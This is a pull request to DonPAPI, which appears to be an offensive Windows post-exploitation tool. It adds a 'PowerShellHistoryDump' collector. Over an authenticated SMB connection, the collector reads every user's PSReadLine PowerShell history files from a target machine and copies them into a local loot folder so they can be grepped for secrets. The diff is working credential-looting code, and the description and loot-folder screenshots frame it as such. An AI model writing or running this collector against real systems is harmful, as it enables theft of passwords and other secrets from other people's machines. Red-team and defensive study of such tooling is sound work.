### PR TITLE
Add PowerShell history looting

### DIFF
--- a/donpapi/collectors/powershellhistory.py
+++ b/donpapi/collectors/powershellhistory.py
@@ -1,0 +1,61 @@
+import os
+import ntpath
+from typing import Any
+from dploot.lib.target import Target
+from dploot.lib.smb import DPLootSMBConnection
+from donpapi.core import DonPAPICore
+from donpapi.lib.logger import DonPAPIAdapter
+
+
+TAG = "PowerShellHistory"
+
+class PowerShellHistoryDump:
+    false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"]
+    user_directories = ["\\Users\\{username}\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\"]
+    max_filesize = 5000000
+
+    def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None:
+        self.target = target
+        self.conn = conn
+        self.masterkeys = masterkeys
+        self.options = options
+        self.logger = logger
+        self.context = context
+        self.found = 0
+
+    def run(self):
+        
+        self.logger.display("Gathering powershell history files")
+        for user in self.context.users:
+            for directory in self.user_directories:
+                directory_path = directory.format(username=user)
+                self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10)
+        self.logger.secret(f"Found {self.found} powershell history files", TAG)
+
+    def dig_files(self, directory_path, recurse_level=0, recurse_max=10):
+        directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
+        if directory_list is not None:
+            for item in directory_list:
+                if item.get_longname() not in self.false_positive:
+                    self.found += 1
+                    new_path = ntpath.join(directory_path, item.get_longname())
+                    file_content = self.conn.readFile(self.context.share, new_path)
+                    local_filepath = os.path.join(self.context.output_dir, *(new_path.split('\\')))
+                    # Stores the file in loot\TARGET\Users\{username}\AppData\
+                    os.makedirs(os.path.dirname(local_filepath), exist_ok=True)
+                    with open(local_filepath, "wb") as f:
+                        if file_content is None:
+                            file_content = b""
+                        f.write(file_content)
+                    
+                    # Stores files in loot\PowerShellHistory
+                    os.makedirs(f"{self.context.output_dir}/../PowerShellHistory", exist_ok=True)
+                    local_filepath = os.path.join(
+                        f"{self.context.output_dir}/../PowerShellHistory", 
+                        f"{item.get_longname()}-{self.found}"
+                    )
+                    with open(local_filepath, "wb") as f:
+                        if file_content is None:
+                            file_content = b""
+                        f.write(file_content)
+                    

--- a/donpapi/entry.py
+++ b/donpapi/entry.py
@@ -40,6 +40,7 @@ from donpapi.collectors.recent_files import FilesDump, TAG as FilesTag
 from donpapi.collectors.sccm import SCCMDump, TAG as SCCMTag
 from donpapi.collectors.mremoteng import MRemoteNgDump, TAG as MRemoteNgTag
 from donpapi.collectors.vnc import VNCDump, TAG as VNCTag
+from donpapi.collectors.powershellhistory import PowerShellHistoryDump, TAG as PowerShellHistoryTag
 from donpapi.lib.config import DonPAPIConfig, parse_config_file
 from donpapi.lib.database import Database, create_db_engine
 from donpapi.lib.paths import DPP_DB_FILE, DPP_LOG_FILE, DPP_PATH
@@ -62,6 +63,7 @@ COLLECTORS_LIST = {
     VaultsTag: VaultsDump,
     VNCTag: VNCDump,
     WifiTag: WifiDump,
+    PowerShellHistoryTag: PowerShellHistoryDump
 }
 
 def set_main_logger(logger , host = "\U0001F480"):


### PR DESCRIPTION
This PR adds a new collector to dump PowerShell history files:

![image](https://github.com/user-attachments/assets/a2106f6e-93c8-4a2d-8292-eb4ad103101e)

I added this piece of code which is kinda hackish but I feel like it's important to have these kind of collectors saving all files they found in order to easily grep for specific keywords:

```python+
# Stores files in loot\PowerShellHistory
os.makedirs(f"{self.context.output_dir}/../PowerShellHistory", exist_ok=True)
local_filepath = os.path.join(
    f"{self.context.output_dir}/../PowerShellHistory", 
    f"{item.get_longname()}-{self.found}"
)
with open(local_filepath, "wb") as f:
    if file_content is None:
        file_content = b""
    f.write(file_content)
```

Which gives the following loot dir:

![image](https://github.com/user-attachments/assets/50a3674d-7ecf-44de-b2dd-e16475355fb0)


Hope you don't mind :P (otherwise I can work on adding the loot dir as another parameter so that I can store results properly)
